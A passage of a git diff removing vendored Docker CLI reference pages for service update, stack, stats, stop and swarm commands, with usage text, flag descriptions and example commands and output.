Username or UID (format: [:]) - --with-registry-auth Send registry authentication details to swarm agents - -w, --workdir string Working directory inside the container -``` - -Updates a service as described by the specified parameters. This command has to be run targeting a manager node. -The parameters are the same as [`docker service create`](service_create.md). Please look at the description there -for further information. 
- 
-Normally, updating a service will only cause the service's tasks to be replaced with new ones if a change to the
-service requires recreating the tasks for it to take effect. For example, only changing the
-`--update-parallelism` setting will not recreate the tasks, because the individual tasks are not affected by this
-setting. However, the `--force` flag will cause the tasks to be recreated anyway. This can be used to perform a
-rolling restart without any changes to the service parameters.
-
-## Examples
-
-### Update a service
-
-```bash
-$ docker service update --limit-cpu 2 redis
-```
-
-### Perform a rolling restart with no parameter changes
-
-```bash
-$ docker service update --force --update-parallelism 1 --update-delay 30s redis
-```
-
-In this example, the `--force` flag causes the service's tasks to be shut down
-and replaced with new ones even though none of the other parameters would
-normally cause that to happen. The `--update-parallelism 1` setting ensures
-that only one task is replaced at a time (this is the default behavior). The
-`--update-delay 30s` setting introduces a 30 second delay between tasks, so
-that the rolling restart happens gradually.
-
-### Adding and removing mounts
-
-Use the `--mount-add` or `--mount-rm` options to add or remove a service's bind-mounts
-or volumes.
-
-The following example creates a service which mounts the `test-data` volume to
-`/somewhere`. The next step updates the service to also mount the `other-volume`
-volume to `/somewhere-else`. The last step unmounts the `/somewhere` mount
-point, effectively removing the `test-data` volume. Each command returns the
-service name.
-
-- The `--mount-add` flag takes the same parameters as the `--mount` flag on
-  `service create`. Refer to the [volumes and
-  bind-mounts](service_create.md#volumes-and-bind-mounts-mount) section in the
-  `service create` reference for details.
-
-- The `--mount-rm` flag takes the `target` path of the mount. 
- -```bash -$ docker service create \ - --name=myservice \ - --mount \ - type=volume,source=test-data,target=/somewhere \ - nginx:alpine \ - myservice - -myservice - -$ docker service update \ - --mount-add \ - type=volume,source=other-volume,target=/somewhere-else \ - myservice - -myservice - -$ docker service update --mount-rm /somewhere myservice - -myservice -``` - -### Adding and removing secrets - -Use the `--secret-add` or `--secret-rm` options add or remove a service's -secrets. - -The following example adds a secret named `ssh-2` and removes `ssh-1`: - -```bash -$ docker service update \ - --secret-add source=ssh-2,target=ssh-2 \ - --secret-rm ssh-1 \ - myservice -``` - -### Update services using templates - -Some flags of `service update` support the use of templating. -See [`service create`](./service_create.md#templating) for the reference. - -## Related information - -* [service create](service_create.md) -* [service inspect](service_inspect.md) -* [service logs](service_logs.md) -* [service ls](service_ls.md) -* [service ps](service_ps.md) -* [service rm](service_rm.md) -* [service scale](service_scale.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md deleted file mode 100644 index 037feaebd7..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md +++ /dev/null @@ -1,98 +0,0 @@ ---- -title: "stack deploy" -description: "The stack deploy command description and usage" -keywords: "stack, deploy, up" ---- - - - -# stack deploy - -```markdown -Usage: docker stack deploy [OPTIONS] STACK - -Deploy a new stack or update an existing stack - -Aliases: - deploy, up - -Options: - --bundle-file string Path to a Distributed Application Bundle file - -c, --compose-file string Path to a Compose file - --help Print usage - --with-registry-auth Send registry authentication details to Swarm agents -``` - -Create and 
update a stack from a `compose` or a `dab` file on the swarm. This command -has to be run targeting a manager node. - -## Compose file - -The `deploy` command supports compose file version `3.0` and above." - -```bash -$ docker stack deploy --compose-file docker-compose.yml vossibility -Ignoring unsupported options: links - -Creating network vossibility_vossibility -Creating network vossibility_default -Creating service vossibility_nsqd -Creating service vossibility_logstash -Creating service vossibility_elasticsearch -Creating service vossibility_kibana -Creating service vossibility_ghollector -Creating service vossibility_lookupd -``` - -You can verify that the services were correctly created - -``` -$ docker service ls -ID NAME MODE REPLICAS IMAGE -29bv0vnlm903 vossibility_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4awt47624qwh vossibility_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4tjx9biia6fs vossibility_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa -7563uuzr9eys vossibility_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 -9gc5m4met4he vossibility_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe -axqh55ipl40h vossibility_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba -``` - -## DAB file - -```bash -$ docker stack deploy --bundle-file vossibility-stack.dab vossibility -Loading bundle from vossibility-stack.dab -Creating service vossibility_elasticsearch -Creating service vossibility_kibana -Creating service vossibility_logstash -Creating service vossibility_lookupd -Creating service vossibility_nsqd -Creating service vossibility_vossibility-collector -``` - -You can verify 
that the services were correctly created: - -```bash -$ docker service ls -ID NAME MODE REPLICAS IMAGE -29bv0vnlm903 vossibility_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4awt47624qwh vossibility_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4tjx9biia6fs vossibility_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa -7563uuzr9eys vossibility_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 -9gc5m4met4he vossibility_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe -axqh55ipl40h vossibility_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba -``` - -## Related information - -* [stack ls](stack_ls.md) -* [stack ps](stack_ps.md) -* [stack rm](stack_rm.md) -* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md deleted file mode 100644 index 05c7215492..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md +++ /dev/null @@ -1,47 +0,0 @@ ---- -title: "stack ls" -description: "The stack ls command description and usage" -keywords: "stack, ls" ---- - - - -# stack ls - -```markdown -Usage: docker stack ls - -List stacks - -Aliases: - ls, list - -Options: - --help Print usage -``` - -Lists the stacks. 
- -For example, the following command shows all stacks and some additional information: - -```bash -$ docker stack ls - -ID SERVICES -vossibility-stack 6 -myapp 2 -``` - -## Related information - -* [stack deploy](stack_deploy.md) -* [stack ps](stack_ps.md) -* [stack rm](stack_rm.md) -* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md deleted file mode 100644 index 101e9feb11..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md +++ /dev/null @@ -1,51 +0,0 @@ ---- -title: "stack ps" -description: "The stack ps command description and usage" -keywords: "stack, ps" ---- - - - -# stack ps - -```markdown -Usage: docker stack ps [OPTIONS] STACK - -List the tasks in the stack - -Options: - -f, --filter filter Filter output based on conditions provided - --help Print usage - --no-resolve Do not map IDs to Names - --no-trunc Do not truncate output -``` - -Lists the tasks that are running as part of the specified stack. This -command has to be run targeting a manager node. - -## Filtering - -The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there -is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). -Multiple filter flags are combined as an `OR` filter. For example, -`-f name=redis.1 -f name=redis.7` returns both `redis.1` and `redis.7` tasks. 
- -The currently supported filters are: - -* id -* name -* desired-state - -## Related information - -* [stack deploy](stack_deploy.md) -* [stack ls](stack_ls.md) -* [stack rm](stack_rm.md) -* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md deleted file mode 100644 index fd639978ec..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md +++ /dev/null @@ -1,38 +0,0 @@ ---- -title: "stack rm" -description: "The stack rm command description and usage" -keywords: "stack, rm, remove, down" ---- - - - -# stack rm - -```markdown -Usage: docker stack rm STACK - -Remove the stack - -Aliases: - rm, remove, down - -Options: - --help Print usage -``` - -Remove the stack from the swarm. This command has to be run targeting -a manager node. - -## Related information - -* [stack deploy](stack_deploy.md) -* [stack ls](stack_ls.md) -* [stack ps](stack_ps.md) -* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md deleted file mode 100644 index 62779b4aa1..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md +++ /dev/null @@ -1,70 +0,0 @@ ---- -title: "stack services" -description: "The stack services command description and usage" -keywords: "stack, services" -advisory: "experimental" ---- - - - -# stack services (experimental) - -```markdown -Usage: docker stack services [OPTIONS] STACK - -List the services in the stack - -Options: - -f, --filter value Filter output based on conditions provided - --help Print usage - -q, --quiet Only display IDs -``` - -Lists the services that are running as part of the specified stack. This -command has to be run targeting a manager node. 
- -For example, the following command shows all services in the `myapp` stack: - -```bash -$ docker stack services myapp - -ID NAME REPLICAS IMAGE COMMAND -7be5ei6sqeye myapp_web 1/1 nginx@sha256:23f809e7fd5952e7d5be065b4d3643fbbceccd349d537b62a123ef2201bc886f -dn7m7nhhfb9y myapp_db 1/1 mysql@sha256:a9a5b559f8821fe73d58c3606c812d1c044868d42c63817fa5125fd9d8b7b539 -``` - -## Filtering - -The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there -is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). -Multiple filter flags are combined as an `OR` filter. - -The following command shows both the `web` and `db` services: - -```bash -$ docker stack services --filter name=myapp_web --filter name=myapp_db myapp - -ID NAME REPLICAS IMAGE COMMAND -7be5ei6sqeye myapp_web 1/1 nginx@sha256:23f809e7fd5952e7d5be065b4d3643fbbceccd349d537b62a123ef2201bc886f -dn7m7nhhfb9y myapp_db 1/1 mysql@sha256:a9a5b559f8821fe73d58c3606c812d1c044868d42c63817fa5125fd9d8b7b539 -``` - -The currently supported filters are: - -* id / ID (`--filter id=7be5ei6sqeye`, or `--filter ID=7be5ei6sqeye`) -* name (`--filter name=myapp_web`) -* label (`--filter label=key=value`) - -## Related information - -* [stack deploy](stack_deploy.md) -* [stack ls](stack_ls.md) -* [stack ps](stack_ps.md) -* [stack rm](stack_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/start.md b/vendor/github.com/docker/docker/docs/reference/commandline/start.md deleted file mode 100644 index 980bce9585..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/start.md +++ /dev/null @@ -1,28 +0,0 @@ ---- -title: "start" -description: "The start command description and usage" -keywords: "Start, container, stopped" ---- - - - -# start - -```markdown -Usage: docker start [OPTIONS] CONTAINER [CONTAINER...] 
- -Start one or more stopped containers - -Options: - -a, --attach Attach STDOUT/STDERR and forward signals - --detach-keys string Override the key sequence for detaching a container - --help Print usage - -i, --interactive Attach container's STDIN -``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stats.md b/vendor/github.com/docker/docker/docs/reference/commandline/stats.md deleted file mode 100644 index f5d0d54f35..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/stats.md +++ /dev/null @@ -1,117 +0,0 @@ ---- -title: "stats" -description: "The stats command description and usage" -keywords: "container, resource, statistics" ---- - - - -# stats - -```markdown -Usage: docker stats [OPTIONS] [CONTAINER...] - -Display a live stream of container(s) resource usage statistics - -Options: - -a, --all Show all containers (default shows just running) - --format string Pretty-print images using a Go template - --help Print usage - --no-stream Disable streaming stats and only pull the first result -``` - -The `docker stats` command returns a live data stream for running containers. To limit data to one or more specific containers, specify a list of container names or ids separated by a space. You can specify a stopped container but stopped containers do not return any data. - -If you want more detailed information about a container's resource usage, use the `/containers/(id)/stats` API endpoint. - -## Examples - -Running `docker stats` on all running containers against a Linux daemon. - - $ docker stats - CONTAINER CPU % MEM USAGE / LIMIT MEM % NET I/O BLOCK I/O - 1285939c1fd3 0.07% 796 KiB / 64 MiB 1.21% 788 B / 648 B 3.568 MB / 512 KB - 9c76f7834ae2 0.07% 2.746 MiB / 64 MiB 4.29% 1.266 KB / 648 B 12.4 MB / 0 B - d1ea048f04e4 0.03% 4.583 MiB / 64 MiB 6.30% 2.854 KB / 648 B 27.7 MB / 0 B - -Running `docker stats` on multiple containers by name and id against a Linux daemon. 
- - $ docker stats fervent_panini 5acfcb1b4fd1 - CONTAINER CPU % MEM USAGE/LIMIT MEM % NET I/O - 5acfcb1b4fd1 0.00% 115.2 MiB/1.045 GiB 11.03% 1.422 kB/648 B - fervent_panini 0.02% 11.08 MiB/1.045 GiB 1.06% 648 B/648 B - -Running `docker stats` on all running containers against a Windows daemon. - - PS E:\> docker stats - CONTAINER CPU % PRIV WORKING SET NET I/O BLOCK I/O - 09d3bb5b1604 6.61% 38.21 MiB 17.1 kB / 7.73 kB 10.7 MB / 3.57 MB - 9db7aa4d986d 9.19% 38.26 MiB 15.2 kB / 7.65 kB 10.6 MB / 3.3 MB - 3f214c61ad1d 0.00% 28.64 MiB 64 kB / 6.84 kB 4.42 MB / 6.93 MB - -Running `docker stats` on multiple containers by name and id against a Windows daemon. - - PS E:\> docker ps -a - CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES - 3f214c61ad1d nanoserver "cmd" 2 minutes ago Up 2 minutes big_minsky - 9db7aa4d986d windowsservercore "cmd" 2 minutes ago Up 2 minutes mad_wilson - 09d3bb5b1604 windowsservercore "cmd" 2 minutes ago Up 2 minutes affectionate_easley - - PS E:\> docker stats 3f214c61ad1d mad_wilson - CONTAINER CPU % PRIV WORKING SET NET I/O BLOCK I/O - 3f214c61ad1d 0.00% 46.25 MiB 76.3 kB / 7.92 kB 10.3 MB / 14.7 MB - mad_wilson 9.59% 40.09 MiB 27.6 kB / 8.81 kB 17 MB / 20.1 MB - -## Formatting - -The formatting option (`--format`) pretty prints container output -using a Go template. - -Valid placeholders for the Go template are listed below: - -Placeholder | Description ------------- | -------------------------------------------- -`.Container` | Container name or ID (user input) -`.Name` | Container name -`.ID` | Container ID -`.CPUPerc` | CPU percentage -`.MemUsage` | Memory usage -`.NetIO` | Network IO -`.BlockIO` | Block IO -`.MemPerc` | Memory percentage (Not available on Windows) -`.PIDs` | Number of PIDs (Not available on Windows) - - -When using the `--format` option, the `stats` command either -outputs the data exactly as the template declares or, when using the -`table` directive, includes column headers as well. 
- -The following example uses a template without headers and outputs the -`Container` and `CPUPerc` entries separated by a colon for all images: - -```bash -$ docker stats --format "{{.Container}}: {{.CPUPerc}}" - -09d3bb5b1604: 6.61% -9db7aa4d986d: 9.19% -3f214c61ad1d: 0.00% -``` - -To list all containers statistics with their name, CPU percentage and memory -usage in a table format you can use: - -```bash -$ docker stats --format "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}" - -CONTAINER CPU % PRIV WORKING SET -1285939c1fd3 0.07% 796 KiB / 64 MiB -9c76f7834ae2 0.07% 2.746 MiB / 64 MiB -d1ea048f04e4 0.03% 4.583 MiB / 64 MiB -``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stop.md b/vendor/github.com/docker/docker/docs/reference/commandline/stop.md deleted file mode 100644 index 3090db98ae..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/stop.md +++ /dev/null @@ -1,29 +0,0 @@ ---- -title: "stop" -description: "The stop command description and usage" -keywords: "stop, SIGKILL, SIGTERM" ---- - - - -# stop - -```markdown -Usage: docker stop [OPTIONS] CONTAINER [CONTAINER...] - -Stop one or more running containers - -Options: - --help Print usage - -t, --time int Seconds to wait for stop before killing it (default 10) -``` - -The main process inside the container will receive `SIGTERM`, and after a grace -period, `SIGKILL`. 
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md deleted file mode 100644 index 44afc27476..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md +++ /dev/null @@ -1,142 +0,0 @@ ---- -title: "swarm init" -description: "The swarm init command description and usage" -keywords: "swarm, init" ---- - - - -# swarm init - -```markdown -Usage: docker swarm init [OPTIONS] - -Initialize a swarm - -Options: - --advertise-addr string Advertised address (format: [:port]) - --autolock Enable manager autolocking (requiring an unlock key to start a stopped manager) - --cert-expiry duration Validity period for node certificates (ns|us|ms|s|m|h) (default 2160h0m0s) - --dispatcher-heartbeat duration Dispatcher heartbeat period (ns|us|ms|s|m|h) (default 5s) - --external-ca external-ca Specifications of one or more certificate signing endpoints - --force-new-cluster Force create a new cluster from current state - --help Print usage - --listen-addr node-addr Listen address (format: [:port]) (default 0.0.0.0:2377) - --max-snapshots uint Number of additional Raft snapshots to retain - --snapshot-interval uint Number of log entries between Raft snapshots (default 10000) - --task-history-limit int Task history retention limit (default 5) -``` - -Initialize a swarm. The docker engine targeted by this command becomes a manager -in the newly created single-node swarm. - - -```bash -$ docker swarm init --advertise-addr 192.168.99.121 -Swarm initialized: current node (bvz81updecsj6wjz393c09vti) is now a manager. - -To add a worker to this swarm, run the following command: - - docker swarm join \ - --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx \ - 172.17.0.2:2377 - -To add a manager to this swarm, run 'docker swarm join-token manager' and follow the instructions. 
-``` - -`docker swarm init` generates two random tokens, a worker token and a manager token. When you join -a new node to the swarm, the node joins as a worker or manager node based upon the token you pass -to [swarm join](swarm_join.md). - -After you create the swarm, you can display or rotate the token using -[swarm join-token](swarm_join_token.md). - -### `--autolock` - -This flag enables automatic locking of managers with an encryption key. The -private keys and data stored by all managers will be protected by the -encryption key printed in the output, and will not be accessible without it. -Thus, it is very important to store this key in order to activate a manager -after it restarts. The key can be passed to `docker swarm unlock` to reactivate -the manager. Autolock can be disabled by running -`docker swarm update --autolock=false`. After disabling it, the encryption key -is no longer required to start the manager, and it will start up on its own -without user intervention. - -### `--cert-expiry` - -This flag sets the validity period for node certificates. - -### `--dispatcher-heartbeat` - -This flag sets the frequency with which nodes are told to use as a -period to report their health. - -### `--external-ca` - -This flag sets up the swarm to use an external CA to issue node certificates. The value takes -the form `protocol=X,url=Y`. The value for `protocol` specifies what protocol should be used -to send signing requests to the external CA. Currently, the only supported value is `cfssl`. -The URL specifies the endpoint where signing requests should be submitted. - -### `--force-new-cluster` - -This flag forces an existing node that was part of a quorum that was lost to restart as a single node Manager without losing its data. - -### `--listen-addr` - -The node listens for inbound swarm manager traffic on this address. The default is to listen on -0.0.0.0:2377. 
It is also possible to specify a network interface to listen on that interface's -address; for example `--listen-addr eth0:2377`. - -Specifying a port is optional. If the value is a bare IP address or interface -name, the default port 2377 will be used. - -### `--advertise-addr` - -This flag specifies the address that will be advertised to other members of the -swarm for API access and overlay networking. If unspecified, Docker will check -if the system has a single IP address, and use that IP address with the -listening port (see `--listen-addr`). If the system has multiple IP addresses, -`--advertise-addr` must be specified so that the correct address is chosen for -inter-manager communication and overlay networking. - -It is also possible to specify a network interface to advertise that interface's address; -for example `--advertise-addr eth0:2377`. - -Specifying a port is optional. If the value is a bare IP address or interface -name, the default port 2377 will be used. - -### `--task-history-limit` - -This flag sets up task history retention limit. - -### `--max-snapshots` - -This flag sets the number of old Raft snapshots to retain in addition to the -current Raft snapshots. By default, no old snapshots are retained. This option -may be used for debugging, or to store old snapshots of the swarm state for -disaster recovery purposes. - -### `--snapshot-interval` - -This flag specifies how many log entries to allow in between Raft snapshots. -Setting this to a higher number will trigger snapshots less frequently. -Snapshots compact the Raft log and allow for more efficient transfer of the -state to new managers. However, there is a performance cost to taking snapshots -frequently. 
- -## Related information - -* [swarm join](swarm_join.md) -* [swarm leave](swarm_leave.md) -* [swarm update](swarm_update.md) -* [swarm join-token](swarm_join_token.md) -* [node rm](node_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md deleted file mode 100644 index 0cde0d7bcd..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md +++ /dev/null @@ -1,102 +0,0 @@ ---- -title: "swarm join" -description: "The swarm join command description and usage" -keywords: "swarm, join" ---- - - - -# swarm join - -```markdown -Usage: docker swarm join [OPTIONS] HOST:PORT - -Join a swarm as a node and/or manager - -Options: - --advertise-addr string Advertised address (format: [:port]) - --help Print usage - --listen-addr node-addr Listen address (format: [:port]) (default 0.0.0.0:2377) - --token string Token for entry into the swarm -``` - -Join a node to a swarm. The node joins as a manager node or worker node based upon the token you -pass with the `--token` flag. If you pass a manager token, the node joins as a manager. If you -pass a worker token, the node joins as a worker. - -### Join a node to swarm as a manager - -The example below demonstrates joining a manager node using a manager token. - -```bash -$ docker swarm join --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2 192.168.99.121:2377 -This node joined a swarm as a manager. -$ docker node ls -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -dkp8vy1dq1kxleu9g4u78tlag * manager2 Ready Active Reachable -dvfxp4zseq4s0rih1selh0d20 manager1 Ready Active Leader -``` - -A cluster should only have 3-7 managers at most, because a majority of managers must be available -for the cluster to function. Nodes that aren't meant to participate in this management quorum -should join as workers instead. 
Managers should be stable hosts that have static IP addresses. - -### Join a node to swarm as a worker - -The example below demonstrates joining a worker node using a worker token. - -```bash -$ docker swarm join --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx 192.168.99.121:2377 -This node joined a swarm as a worker. -$ docker node ls -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -7ln70fl22uw2dvjn2ft53m3q5 worker2 Ready Active -dkp8vy1dq1kxleu9g4u78tlag worker1 Ready Active Reachable -dvfxp4zseq4s0rih1selh0d20 * manager1 Ready Active Leader -``` - -### `--listen-addr value` - -If the node is a manager, it will listen for inbound swarm manager traffic on this -address. The default is to listen on 0.0.0.0:2377. It is also possible to specify a -network interface to listen on that interface's address; for example `--listen-addr eth0:2377`. - -Specifying a port is optional. If the value is a bare IP address, or interface -name, the default port 2377 will be used. - -This flag is generally not necessary when joining an existing swarm. - -### `--advertise-addr value` - -This flag specifies the address that will be advertised to other members of the -swarm for API access. If unspecified, Docker will check if the system has a -single IP address, and use that IP address with the listening port (see -`--listen-addr`). If the system has multiple IP addresses, `--advertise-addr` -must be specified so that the correct address is chosen for inter-manager -communication and overlay networking. - -It is also possible to specify a network interface to advertise that interface's address; -for example `--advertise-addr eth0:2377`. - -Specifying a port is optional. If the value is a bare IP address, or interface -name, the default port 2377 will be used. - -This flag is generally not necessary when joining an existing swarm. 
- -### `--token string` - -Secret value required for nodes to join the swarm - - -## Related information - -* [swarm init](swarm_init.md) -* [swarm leave](swarm_leave.md) -* [swarm update](swarm_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md deleted file mode 100644 index d731f028ba..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md +++ /dev/null @@ -1,105 +0,0 @@ ---- -title: "swarm join-token" -description: "The swarm join-token command description and usage" -keywords: "swarm, join-token" ---- - - - -# swarm join-token - -```markdown -Usage: docker swarm join-token [OPTIONS] (worker|manager) - -Manage join tokens - -Options: - --help Print usage - -q, --quiet Only display token - --rotate Rotate join token -``` - -Join tokens are secrets that allow a node to join the swarm. There are two -different join tokens available, one for the worker role and one for the manager -role. You pass the token using the `--token` flag when you run -[swarm join](swarm_join.md). Nodes use the join token only when they join the -swarm. - -You can view or rotate the join tokens using `swarm join-token`. 
- -As a convenience, you can pass `worker` or `manager` as an argument to -`join-token` to print the full `docker swarm join` command to join a new node to -the swarm: - -```bash -$ docker swarm join-token worker -To add a worker to this swarm, run the following command: - - docker swarm join \ - --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx \ - 172.17.0.2:2377 - -$ docker swarm join-token manager -To add a manager to this swarm, run the following command: - - docker swarm join \ - --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2 \ - 172.17.0.2:2377 -``` - -Use the `--rotate` flag to generate a new join token for the specified role: - -```bash -$ docker swarm join-token --rotate worker -Successfully rotated worker join token. - -To add a worker to this swarm, run the following command: - - docker swarm join \ - --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-b30ljddcqhef9b9v4rs7mel7t \ - 172.17.0.2:2377 -``` - -After using `--rotate`, only the new token will be valid for joining with the specified role. - -The `-q` (or `--quiet`) flag only prints the token: - -```bash -$ docker swarm join-token -q worker - -SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-b30ljddcqhef9b9v4rs7mel7t -``` - -### `--rotate` - -Because tokens allow new nodes to join the swarm, you should keep them secret. -Be particularly careful with manager tokens since they allow new manager nodes -to join the swarm. A rogue manager has the potential to disrupt the operation of -your swarm. - -Rotate your swarm's join token if a token gets checked-in to version control, -stolen, or a node is compromised. You may also want to periodically rotate the -token to ensure any unknown token leaks do not allow a rogue node to join -the swarm. - -To rotate the join token and print the newly generated token, run -`docker swarm join-token --rotate` and pass the role: `manager` or `worker`. 
- -Rotating a join-token means that no new nodes will be able to join the swarm -using the old token. Rotation does not affect existing nodes in the swarm -because the join token is only used for authorizing new nodes joining the swarm. - -### `--quiet` - -Only print the token. Do not print a complete command for joining. - -## Related information - -* [swarm join](swarm_join.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md deleted file mode 100644 index c0d9437818..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md +++ /dev/null @@ -1,58 +0,0 @@ ---- -title: "swarm leave" -description: "The swarm leave command description and usage" -keywords: "swarm, leave" ---- - - - -# swarm leave - -```markdown -Usage: docker swarm leave [OPTIONS] - -Leave the swarm - -Options: - -f, --force Force this node to leave the swarm, ignoring warnings - --help Print usage -``` - -When you run this command on a worker, that worker leaves the swarm. - -You can use the `--force` option to on a manager to remove it from the swarm. -However, this does not reconfigure the swarm to ensure that there are enough -managers to maintain a quorum in the swarm. The safe way to remove a manager -from a swarm is to demote it to a worker and then direct it to leave the quorum -without using `--force`. Only use `--force` in situations where the swarm will -no longer be used after the manager leaves, such as in a single-node swarm. 
- -Consider the following swarm, as seen from the manager: -```bash -$ docker node ls -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -7ln70fl22uw2dvjn2ft53m3q5 worker2 Ready Active -dkp8vy1dq1kxleu9g4u78tlag worker1 Ready Active -dvfxp4zseq4s0rih1selh0d20 * manager1 Ready Active Leader -``` - -To remove `worker2`, issue the following command from `worker2` itself: -```bash -$ docker swarm leave -Node left the default swarm. -``` -To remove an inactive node, use the [`node rm`](node_rm.md) command instead. - -## Related information - -* [node rm](node_rm.md) -* [swarm init](swarm_init.md) -* [swarm join](swarm_join.md) -* [swarm update](swarm_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md deleted file mode 100644 index 164b7d35a4..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md +++ /dev/null @@ -1,41 +0,0 @@ ---- -title: "swarm unlock" -description: "The swarm unlock command description and usage" -keywords: "swarm, unlock" ---- - - - -# swarm unlock - -```markdown -Usage: docker swarm unlock - -Unlock swarm - -Options: - --help Print usage -``` - -Unlocks a locked manager using a user-supplied unlock key. This command must be -used to reactivate a manager after its Docker daemon restarts if the autolock -setting is turned on. The unlock key is printed at the time when autolock is -enabled, and is also available from the `docker swarm unlock-key` command. 
- - -```bash -$ docker swarm unlock -Please enter unlock key: -``` - -## Related information - -* [swarm init](swarm_init.md) -* [swarm update](swarm_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md deleted file mode 100644 index a2597fe9ab..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md +++ /dev/null @@ -1,84 +0,0 @@ ---- -title: "swarm unlock-key" -description: "The swarm unlock-keycommand description and usage" -keywords: "swarm, unlock-key" ---- - - - -# swarm unlock-key - -```markdown -Usage: docker swarm unlock-key [OPTIONS] - -Manage the unlock key - -Options: - --help Print usage - -q, --quiet Only display token - --rotate Rotate unlock key -``` - -An unlock key is a secret key needed to unlock a manager after its Docker daemon -restarts. These keys are only used when the autolock feature is enabled for the -swarm. - -You can view or rotate the unlock key using `swarm unlock-key`. To view the key, -run the `docker swarm unlock-key` command without any arguments: - - -```bash -$ docker 